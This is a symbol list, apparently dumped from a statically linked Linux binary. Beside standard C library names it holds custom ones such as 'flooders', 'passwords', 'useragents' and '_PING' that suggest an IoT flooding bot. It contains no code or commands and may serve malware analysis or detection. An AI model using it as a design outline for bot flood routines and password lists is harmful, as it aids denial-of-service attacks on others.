_dl_aux_init
_errno
atoi
successes
_stdio_openlist_del_lock
__GI_inet_aton
_PING
fgets_unlocked
__GI_bind
_exit
szprintf
strspn
__libc_recv
__libc_creat
strlen
lseek64
open
toupper
__libc_write
__malloc_consolidate
_ppfs_parsespec
__GI_strtol
stop
__GI_getuid
__GI_strtok_r
__GI_errno
__libc_sendto
__stdio_trans2w_o
__GI_vfork
strchr
__GI_rawmemchr
__GI_raise
__data_start
__GI_inet_addr
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
macAddress
__GI___errno_location
readUntil
fcntl
flooders
read_with_timeout
__GI_atoi
fseeko64
__GI_sprintf
__ctype_tolower
wcrtomb
__GI_getsockname
close
__libc_connect
passwords
__GI_strlen
pids
vfprintf
strpbrk
_433
_load_inttype
raise
useragents
free
sigprocmask
getsockname
